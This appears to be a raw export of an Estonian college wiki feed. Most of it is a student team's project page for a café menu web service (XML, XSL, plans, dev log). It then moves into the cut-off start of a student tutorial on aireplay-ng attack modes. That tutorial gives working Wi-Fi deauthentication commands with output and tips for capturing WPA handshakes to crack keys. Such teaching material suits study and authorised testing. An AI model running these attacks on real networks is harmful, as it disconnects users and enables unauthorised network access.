          o XML fail, stiilifail ja skeemifail peavad olema valmis ja wikilehel kirjeldatud hiljemalt 27. veebruar 2011.&lt;br /&gt;
          o Arvamused XML-failide kohta peavad tehtud olema 4. märts 2011&lt;br /&gt;
&lt;br /&gt;
    * Veebiteenus&lt;br /&gt;
          o Veebiteenus peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.&lt;br /&gt;
          o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011&lt;br /&gt;
          o Veebiteenus tuleb esitleda!&lt;br /&gt;
&lt;br /&gt;
    * Klientrakendused&lt;br /&gt;
          o Klientrakendused peavad olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.&lt;br /&gt;
          o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011&lt;br /&gt;
          o Klientrakendused tuleb esitleda!&lt;br /&gt;
&lt;br /&gt;
    * Meeskonna kokkuvõttev aruanne&lt;br /&gt;
          o Meeskonnatöö kokkuvõttev aruanne peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 8.mai 2011&lt;br /&gt;
          o Arvamused Meeskonnatöö kokkuvõtva aruande ja esitluse kohta tuleb esitada hiljemalt päev enne eksamit&lt;br /&gt;
          o Meeskonna kokkuvõttev aruanne ja töö lõplik tulemus tuleb esitleda!&lt;br /&gt;
&lt;br /&gt;
==Meeskond==&lt;br /&gt;
*Jaan Kruusma  - projektijuht, analüüs&lt;br /&gt;
*Taavi Ilves - arendus, veebiteenus, facebook api&lt;br /&gt;
*Tanel Liiv - arendus, veebiteenus&lt;br /&gt;
*Indrek Kruuser - arendus, klientrakendus&lt;br /&gt;
*Hannes Karask - arendus, adminniliides, klientrakendus&lt;br /&gt;
&lt;br /&gt;
*Punktid jagatakse võrdselt*&lt;br /&gt;
&lt;br /&gt;
==Idee==&lt;br /&gt;
Idee on luua kohviku menüü haldamise tarkvara. Kasutajal ehk kohvikul on võimalus interneti teel kirjeldada müüki minevad tooted ning tooteid kuvatakse kohvikutes LCD display pealt kui ka Facebooki kaudu kõikide kohvikute menüüsi jälgida. Me lähtume KISS põhimõttest ja hoiame info võimalikult konkreetsena, et kasutaja ei peaks pool päeva toite sisestama või pidevalt kogust arvestama.&lt;br /&gt;
&lt;br /&gt;
==Planeering==&lt;br /&gt;
* Veebiteenuse ehitame IronPythoniga .Net frameworki peale.&lt;br /&gt;
* Arenduskeskond on Visual Studio 2010, millel on IronPython liides.&lt;br /&gt;
* Andmebaasina kasutame MySQL&#039;i, see on kiire ja lihtne üles seada.&lt;br /&gt;
* Kliendipoolse lahenduse teeme Asp.Net&#039;i aines kõrval projektina.&lt;br /&gt;
* Kõik mis kuvatakse kasutajale ehk kohviku kylastajale teeme HTMLi ja JavaScriptiga&lt;br /&gt;
* Andmemudeli diagrammi koostame programmiga QSEE Superlite.&lt;br /&gt;
&lt;br /&gt;
==Veebiteenus==&lt;br /&gt;
*IronPythoni kasutus osutus vaevaliseks, asendasime selle C sharpiga.&lt;br /&gt;
**MVC3 raamistik&lt;br /&gt;
**Razor view engine mugavamaks kirjutamiseks&lt;br /&gt;
**MSSQL 2008 R2 andmebaasi mootoriks&lt;br /&gt;
**Andmete vahekiht LINQ To Entities&lt;br /&gt;
&lt;br /&gt;
*Tagastab kohviku menüü veebiteenuse ID järgi &lt;br /&gt;
*Klienditeenus genereerib igale kohvikule ID&lt;br /&gt;
*auth meetod &lt;br /&gt;
**tuvastatkse kasutaja&lt;br /&gt;
**päring kohviku andmetele&lt;br /&gt;
&lt;br /&gt;
*api meetod &lt;br /&gt;
**auth vastusest kuvab kohviku menüü&lt;br /&gt;
**Päeva menüü xml kujul &lt;br /&gt;
&lt;br /&gt;
*Statistika korjamine &lt;br /&gt;
**Kohviku, meetodi ning IP põhine&lt;br /&gt;
***Võimaldab näha statistikat kasutaja ja kohviku lõikes&lt;br /&gt;
***Võimaldab näha koormust meetodi põhiselt&lt;br /&gt;
**Minimaalne täpsus üks tund&lt;br /&gt;
***Et andmemahud ei kasvaks üle pea&lt;br /&gt;
***Et oleks võimalik koormust hinnata kellaajaliselt&lt;br /&gt;
*[[File:HSFBstats.png]]&lt;br /&gt;
&lt;br /&gt;
===Toodete kuvamine===&lt;br /&gt;
[[File:HSFBVeebiteenus.png]]&lt;br /&gt;
&lt;br /&gt;
==Andmediagramm==&lt;br /&gt;
&lt;br /&gt;
[[File:HSFB.png]]&lt;br /&gt;
&lt;br /&gt;
==Desktop Rakendus==&lt;br /&gt;
*Töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4&lt;br /&gt;
[[File:HFt66.png]]&lt;br /&gt;
&lt;br /&gt;
==Facebook Api==&lt;br /&gt;
*Toitude hääletamine reaalajas&lt;br /&gt;
[[File:HSFBapi.jpg]]&lt;br /&gt;
&lt;br /&gt;
== XML Fail ==&lt;br /&gt;
Highlighted: http://sprunge.us/DPIe?xml&lt;br /&gt;
&lt;br /&gt;
    &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot; ?&amp;gt;&lt;br /&gt;
    &amp;lt;?xml-stylesheet type=&amp;quot;text/xsl&amp;quot; href=&amp;quot;default.xsl&amp;quot;?&amp;gt;&lt;br /&gt;
    &amp;lt;kohvikud xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot;&lt;br /&gt;
    xsi:noNamespaceSchemaLocation=&amp;quot;kohvikud.xsd&amp;quot;&amp;gt;&lt;br /&gt;
            &amp;lt;kohvik name=&amp;quot;IT KOHVIK&amp;quot; staatus=&amp;quot;Nummisi pannkooke saadaval&amp;quot;&amp;gt;&lt;br /&gt;
                    &amp;lt;toit tyyp=&amp;quot;praad&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;pilt&amp;gt;&lt;br /&gt;
                                    &amp;lt;url width=&amp;quot;100&amp;quot; height=&amp;quot;100&amp;quot;&amp;gt;http://www.neti.ee/pilt.jpg&amp;lt;/url&amp;gt;&lt;br /&gt;
                            &amp;lt;/pilt&amp;gt;&lt;br /&gt;
                            &amp;lt;pealkiri&amp;gt;kanapraad&amp;lt;/pealkiri&amp;gt;&lt;br /&gt;
                            &amp;lt;kirjeldus&amp;gt;sinihallitus sokiga&amp;lt;/kirjeldus&amp;gt;&lt;br /&gt;
                            &amp;lt;poolhind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;100&amp;lt;/poolhind&amp;gt;&lt;br /&gt;
                            &amp;lt;tervehind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;200&amp;lt;/tervehind&amp;gt;&lt;br /&gt;
                            &amp;lt;allahindlus&amp;gt;50%&amp;lt;/allahindlus&amp;gt;&lt;br /&gt;
                            &amp;lt;kehtib&amp;gt;31.03.2011&amp;lt;/kehtib&amp;gt;&lt;br /&gt;
                            &amp;lt;liked&amp;gt;34&amp;lt;/liked&amp;gt;&lt;br /&gt;
                    &amp;lt;/toit&amp;gt;&lt;br /&gt;
                    &amp;lt;toit tyyp=&amp;quot;supp&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;pilt&amp;gt;&lt;br /&gt;
                                    &amp;lt;url width=&amp;quot;100&amp;quot; height=&amp;quot;100&amp;quot;&amp;gt;http://www.neti.ee/pilt2.jpg&amp;lt;/url&amp;gt;&lt;br /&gt;
                            &amp;lt;/pilt&amp;gt;&lt;br /&gt;
                            &amp;lt;pealkiri&amp;gt;õunasupp&amp;lt;/pealkiri&amp;gt;&lt;br /&gt;
                            &amp;lt;kirjeldus&amp;gt;koorega&amp;lt;/kirjeldus&amp;gt;&lt;br /&gt;
                            &amp;lt;poolhind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;50&amp;lt;/poolhind&amp;gt;&lt;br /&gt;
                            &amp;lt;tervehind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;120&amp;lt;/tervehind&amp;gt;&lt;br /&gt;
                            &amp;lt;allahindlus&amp;gt;10%&amp;lt;/allahindlus&amp;gt;&lt;br /&gt;
                            &amp;lt;kehtib&amp;gt;31.03.2011&amp;lt;/kehtib&amp;gt;&lt;br /&gt;
                            &amp;lt;liked&amp;gt;33&amp;lt;/liked&amp;gt;&lt;br /&gt;
                    &amp;lt;/toit&amp;gt;&lt;br /&gt;
            &amp;lt;/kohvik&amp;gt;&lt;br /&gt;
            &amp;lt;kohvik name=&amp;quot;TTY KOHVIK&amp;quot; staatus=&amp;quot;Parim koht&amp;quot;&amp;gt;&lt;br /&gt;
                    &amp;lt;toit tyyp=&amp;quot;praad&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;pilt&amp;gt;&lt;br /&gt;
                                    &amp;lt;url width=&amp;quot;100&amp;quot; height=&amp;quot;100&amp;quot;&amp;gt;http://www.neti.ee/pilt2.jpg&amp;lt;/url&amp;gt;&lt;br /&gt;
                            &amp;lt;/pilt&amp;gt;&lt;br /&gt;
                            &amp;lt;pealkiri&amp;gt;seapraad&amp;lt;/pealkiri&amp;gt;&lt;br /&gt;
                            &amp;lt;kirjeldus&amp;gt;seentega&amp;lt;/kirjeldus&amp;gt;&lt;br /&gt;
                            &amp;lt;poolhind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;200&amp;lt;/poolhind&amp;gt;&lt;br /&gt;
                            &amp;lt;tervehind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;420&amp;lt;/tervehind&amp;gt;&lt;br /&gt;
                            &amp;lt;allahindlus&amp;gt;10%&amp;lt;/allahindlus&amp;gt;&lt;br /&gt;
                            &amp;lt;kehtib&amp;gt;31.03.2011&amp;lt;/kehtib&amp;gt;&lt;br /&gt;
                            &amp;lt;liked&amp;gt;2&amp;lt;/liked&amp;gt;&lt;br /&gt;
                    &amp;lt;/toit&amp;gt;&lt;br /&gt;
            &amp;lt;/kohvik&amp;gt;&lt;br /&gt;
    &amp;lt;/kohvikud&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== XSL ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;xsl:stylesheet version=&amp;quot;1.0&amp;quot;&lt;br /&gt;
xmlns:xsl=&amp;quot;http://www.w3.org/1999/XSL/Transform&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;xsl:template match=&amp;quot;/&amp;quot;&amp;gt;&lt;br /&gt;
	&amp;lt;html&amp;gt;&lt;br /&gt;
	&amp;lt;body&amp;gt;&lt;br /&gt;
	&amp;lt;h2&amp;gt;Kohvikud&amp;lt;/h2&amp;gt;&lt;br /&gt;
	&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr bgcolor=&amp;quot;#9acd32&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;th&amp;gt;Nimi&amp;lt;/th&amp;gt;&lt;br /&gt;
			&amp;lt;th&amp;gt;Staatus&amp;lt;/th&amp;gt;&lt;br /&gt;
		&amp;lt;th&amp;gt;Menüü&amp;lt;/th&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;xsl:for-each select=&amp;quot;kohvikud/kohvik&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;@name&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;td valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;@staatus&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;td valign=&amp;quot;top&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
			 &amp;lt;tr bgcolor=&amp;quot;#2acd32&amp;quot;&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Pealkiri&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Väike portsjon&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Täis portsjon&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Soodustus&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Kehtib&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Kirjeldus&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Laike&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Pildid&amp;lt;/td&amp;gt;&lt;br /&gt;
			 &amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;xsl:for-each select=&amp;quot;./toit&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;tr&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;pealkiri&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;poolhind&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;tervehind&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;allahindlus&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;kehtib&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;kirjeldus&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;liked&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&lt;br /&gt;
					&amp;lt;xsl:for-each select=&amp;quot;./pilt&amp;quot;&amp;gt;&lt;br /&gt;
						&amp;lt;xsl:value-of select=&amp;quot;url&amp;quot;/&amp;gt;&lt;br /&gt;
					&amp;lt;/xsl:for-each&amp;gt;&lt;br /&gt;
				&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;/xsl:for-each&amp;gt;&lt;br /&gt;
		&amp;lt;/table&amp;gt;&lt;br /&gt;
		&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;/xsl:for-each&amp;gt;&lt;br /&gt;
	&amp;lt;/table&amp;gt;&lt;br /&gt;
	&amp;lt;/body&amp;gt;&lt;br /&gt;
	&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/xsl:template&amp;gt;&lt;br /&gt;
&amp;lt;/xsl:stylesheet&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== ASP.Net aine raames adminni sisuhaldus ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Nagu eelpool mainitud, kasutame MVC3 raamistikku, andmeid liigutab LINQ to entities.&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kasutajal tuleb autentida, selleks on aspi enda membership lahendus.&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_login.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Menüüde halduse esileht&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_front.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kohvikute vaade, üldadmin näeb kõiki kohvikuid, tavaadmin ainult temaga seostatud kohvikuid&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_cafes_front.png]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Igal kohvikul on enda tooted..&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_tooted_front.png]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;..mille sisestamine näeb välja selline:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_edit_product.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tooteid saab luua, kustutada ja välja lülitada (viimane toimub ajaxiga).&lt;br /&gt;
&lt;br /&gt;
Tootel on küljes kehtivus kuupäev, vastavalt millele genereeritakse menüü. Menüüs on iga päeva peal toode, mis sel päeval kehtib.&lt;br /&gt;
&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_menufilter.png]]&lt;br /&gt;
&lt;br /&gt;
== Logi ==&lt;br /&gt;
=== 16. Mai ===&lt;br /&gt;
Finaalesitlus&lt;br /&gt;
&lt;br /&gt;
=== 13. Mai ===&lt;br /&gt;
Ebaõnne päev ja lõpusirge arendus!&lt;br /&gt;
&lt;br /&gt;
===  6. Mai === &lt;br /&gt;
Desktopvaate analüüs &lt;br /&gt;
töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4&lt;br /&gt;
&lt;br /&gt;
=== 29. Aprill ===&lt;br /&gt;
Veebiteenuse parendamine&lt;br /&gt;
&lt;br /&gt;
=== 22. Aprill ===&lt;br /&gt;
Konkurendiga koostöö lepingu sõlmimine, koodivahetus.&lt;br /&gt;
&lt;br /&gt;
=== 18. Aprill ===&lt;br /&gt;
Teenuse presentatsioon, karm tagasiside ehk esimese testimis tulemuste analüüs ja iteratiivse arenguga jätkamine&lt;br /&gt;
&lt;br /&gt;
=== 15-17. Aprill ===&lt;br /&gt;
Veebiteenuse lõpu sprint&lt;br /&gt;
Andmebaasi lisatud tabel, mis korjab statistikat&lt;br /&gt;
&lt;br /&gt;
===  8. Aprill ===&lt;br /&gt;
Arendus Sprint &lt;br /&gt;
*määramatusest tulenevad probleemid&lt;br /&gt;
*vaate toorik&lt;br /&gt;
*versiooni halduse&lt;br /&gt;
&lt;br /&gt;
===  4. Aprill ===&lt;br /&gt;
Alamprojekt baasitäitmiseks&lt;br /&gt;
&lt;br /&gt;
=== 18. Märts ===&lt;br /&gt;
Andmebaasi lihvimine, teenuse toorik.&lt;br /&gt;
Projektijuht 2 nädalat komandeeringus, arenduse koordinaator sinisel lehel.&lt;br /&gt;
&lt;br /&gt;
=== 15. Märts ===&lt;br /&gt;
Töötav andmebaas, metsikud vaevad versioonihaldusega.&lt;br /&gt;
===  7. Märts ===&lt;br /&gt;
Rühmatöö ettevalmistused ja ümberkorraldused: MVC3 (Razor view engine) ja MSSQL SERVER 2008 R2 asendamine. Versioonihalduseks Mercurial HG. &lt;br /&gt;
===  1. Märts ===&lt;br /&gt;
Andmediagrammi esialgsed kavandid, et sobiks xmliga kokku.&lt;br /&gt;
&lt;br /&gt;
=== 23. Veebruar ===&lt;br /&gt;
Tekkisid määramatusest tulenevad probleemid, haigestumine ja riigipühad.&lt;br /&gt;
Xml ja Xsl valmis, Schema vajab täiendusi.&lt;br /&gt;
&lt;br /&gt;
=== 17. Veebruar ===&lt;br /&gt;
Projekti kavand pandi paika ja jaotati esialgsed töö ülesanded.&lt;br /&gt;
Esialgse Xml&#039;i draft, endiselt arenduses.&lt;br /&gt;
&lt;br /&gt;
=== 16. Veebruar ===&lt;br /&gt;
Drastilised muudatused arendus tööriistade valikul. Põhi osa programmist luuakse Pythoniga .NET raamistikus, aga kliendi liides tehakse ikkagi asp.net&#039;iga.&lt;br /&gt;
&lt;br /&gt;
=== 14. Veebruar ===&lt;br /&gt;
Meeskonna nime valik ja wiki lehe alustamine.&lt;br /&gt;
&lt;br /&gt;
=== 7. Veebruar ===&lt;br /&gt;
Arendus vahenditega tutvumine, kuidas teha, mida teha. Palju metadata kogumist.&lt;br /&gt;
&lt;br /&gt;
=== 2. Veebruar ===&lt;br /&gt;
Uue meeskonna moodustamine ja idee kujunemine&lt;br /&gt;
&lt;br /&gt;
[[Category: Võrgurakendused II: hajussüsteemide ehitamine]]&lt;br /&gt;
[[Category: Veebirakenduste loomine ASP.NET abil]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32802</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32802"/>
		<updated>2011-05-24T19:27:13Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Klientideta võrgu ründamine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
